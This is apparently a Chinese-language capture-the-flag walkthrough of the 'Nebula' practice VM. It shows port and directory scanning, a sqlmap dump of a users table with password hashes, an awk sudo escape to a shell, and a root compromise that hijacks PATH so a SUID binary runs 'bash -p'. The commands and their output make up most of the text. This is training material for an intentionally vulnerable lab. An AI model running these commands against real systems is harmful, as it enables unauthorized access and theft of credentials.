Nebula

备注

[Linux VM] [Tested on VirtualBox and VMWare.] created by || Kretinga

⏲️ Release Date // 2024-01-02

✔️ MD5 // e776777fb487bea62da80840b03c8fe6

☠ Root // 70

💀 User // 68

📝Notes // Enjoy.

靶机启动

靶机 IP

192.168.56.108

nmap 信息搜集

Nmap scan report for 192.168.56.108
Host is up (0.00049s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 63:9c:2e:57:91:af:1e:2e:25:ba:55:fd:ba:48:a8:60 (RSA)
|   256 d0:05:24:1d:a8:99:0e:d6:d1:e5:c5:5b:40:6a:b9:f9 (ECDSA)
|_  256 d8:4a:b8:86:9d:66:6d:7f:a4:cb:d0:73:a1:f4:b5:19 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Nebula Lexus Labs

web 服务

尝试进行目录爆破

┌─[✗]─[randark@parrot]─[~]
└──╼ $feroxbuster -u http://192.168.56.108 -w /usr/share/wordlists/seclists//Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.108
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists//Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.1
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      314c http://192.168.56.108/img => http://192.168.56.108/img/
301      GET        9l       28w      316c http://192.168.56.108/login => http://192.168.56.108/login/
200      GET      117l      627w    49089c http://192.168.56.108/img/image1
200      GET     1121l     5980w   469563c http://192.168.56.108/img/image2
200      GET       76l      291w     3479c http://192.168.56.108/
301      GET        9l       28w      317c http://192.168.56.108/joinus => http://192.168.56.108/joinus/

对 http://192.168.56.108/joinus/ 这个路径进行探测，发现以下信息

http://192.168.56.108/joinus/application_form.pdf

https://nebulalabs.org/meetings?user=admin&password=d46df8e6a5627debf930f7b5c8f3b083

得到以下凭据

admin:d46df8e6a5627debf930f7b5c8f3b083

成功登陆后台

搜索功能存在 sql 注入

对浏览器的访问请求进行抓包

GET /login/search_central.php?id=1 HTTP/1.1
Host: 192.168.56.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://192.168.56.108/login/search_central.php?id=1
Cookie: PHPSESSID=p8mg4vbtsjc4iahtr48g4koi76
Upgrade-Insecure-Requests: 1

将原始请求的数据保存为 sqlmap.txt 文件，进行自动化攻击

┌─[randark@parrot]─[~/tmp]
└──╼ $sqlmap -r sqlmap.txt --dbs
......
[*] information_schema
[*] nebuladb
┌─[randark@parrot]─[~/tmp]
└──╼ $sqlmap -r sqlmap.txt -D nebuladb --tables
......
+----------+
| central  |
| centrals |
| users    |
+----------+

将数据库的数据 dump 下来

Database: nebuladb
Table: users
[7 entries]
+----+----------+----------------------------------------------+-------------+
| id | is_admin | password                                     | username    |
+----+----------+----------------------------------------------+-------------+
| 1  | 1        | d46df8e6a5627debf930f7b5c8f3b083             | admin       |
| 2  | 0        | c8c605999f3d8352d7bb792cf3fdb25b (999999999) | pmccentral  |
| 3  | 0        | 5f823f1ac7c9767c8d1efbf44158e0ea             | Frederick   |
| 3  | 0        | 4c6dda8a9d149332541e577b53e2a3ea             | Samuel      |
| 5  | 0        | 41ae0e6fbe90c08a63217fc964b12903             | Mary        |
| 6  | 0        | 5d8cdc88039d5fc021880f9af4f7c5c3             | hecolivares |
| 7  | 1        | c8c605999f3d8352d7bb792cf3fdb25b (999999999) | pmccentral  |
+----+----------+----------------------------------------------+-------------+

得到一组凭据

pmccentral:999999999

User - pmccentral

┌─[randark@parrot]─[~/tmp]
└──╼ $pwncat-cs pmccentral@192.168.56.108
[19:46:46] Welcome to pwncat 🐈!
Password: *********
[19:46:50] 192.168.56.108:22: registered new host w/ db
(local) pwncat$ back
(remote) pmccentral@laboratoryuser:/home/pmccentral$ whoami
pmccentral

读取命令行历史

/home/pmccentral/.bash_history

ls
cd laboratoryuser/
sudo su
cd pmccentral/
ls
nano
ls
mkdir desktop downloads documents
ls
ll
exit
ls
tree
ls
ls desktop/k
ls desktop/
ls documents/
ls
ls downloads/
cd documents/
ls
cat employees.txt
cd ..
ls
cd laboratoryadmin/
ls
cd autoScripts/
ls
whoami
ll
ls
cd ..
ls
exit
ls
cd documents/
exit

尝试提权

sudo -l

(remote) pmccentral@laboratoryuser:/home/pmccentral$ sudo -l
[sudo] password for pmccentral:
Matching Defaults entries for pmccentral on laboratoryuser:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pmccentral may run the following commands on laboratoryuser:
    (laboratoryadmin) /usr/bin/awk

尝试利用 awk 实现提权

sudo -u laboratoryadmin /usr/bin/awk 'BEGIN {system("/bin/bash")}'

User - laboratoryadmin

laboratoryadmin@laboratoryuser:/home/pmccentral$ whoami
laboratoryadmin

flag - user

laboratoryadmin@laboratoryuser:~$ cat user.txt
flag{$udOeR$_Pr!V11E9E_I5_7En53}

尝试提权

对用户目录进行探测

laboratoryadmin@laboratoryuser:~/autoScripts$ pwd;ls -lah
/home/laboratoryadmin/autoScripts
total 32K
drwxr-xr-x 2 laboratoryadmin laboratoryadmin 4.0K Dec 18 20:16 .
drwx------ 8 laboratoryadmin laboratoryadmin 4.0K Dec 18 16:15 ..
-rwxrwxr-x 1 laboratoryadmin laboratoryadmin    8 Dec 18 20:16 head
-rwsr-xr-x 1 root            root             17K Dec 17 15:40 PMCEmployees

将两个程序都下载到本地进行分析

程序逆向分析

PMCEmployees

对程序进行反编译

int __fastcall main(int argc, const char **argv, const char **envp)
{
  setuid(0);
  printf("Showing top 10 best employees of PMC company");
  return system("head /home/pmccentral/documents/employees.txt");
}

并且可以注意到 /home/laboratoryadmin/autoScripts/head 这个文件是可控的，那么就可以直接接管权限了

head 文件分析

/home/laboratoryadmin/autoScripts/head

bash -p

备注

好奇怪，这个靶机的作者这是直接把提权方案直接往嘴巴里面喂？

User - root

备注

下面的方案暴力修改了 PATH 环境变量，不建议使用此方案

laboratoryadmin@laboratoryuser:~/autoScripts$ echo '/usr/bin/bash -p' > head
laboratoryadmin@laboratoryuser:~/autoScripts$ export PATH=/home/laboratoryadmin/autoScripts
laboratoryadmin@laboratoryuser:~/autoScripts$ ./PMCEmployees
root@laboratoryuser:~/autoScripts# /usr/bin/whoami
root

备注

建议使用此方案

(remote) laboratoryadmin@laboratoryuser:/home/laboratoryadmin/autoScripts$ export PATH=/home/laboratoryadmin/autoScripts:$PATH
(remote) laboratoryadmin@laboratoryuser:/home/laboratoryadmin/autoScripts$ ./PMCEmployees
root@laboratoryuser:~/autoScripts# whoami
root

flag - root

root@laboratoryuser:/root# cat root.txt
flag{r00t_t3ns0}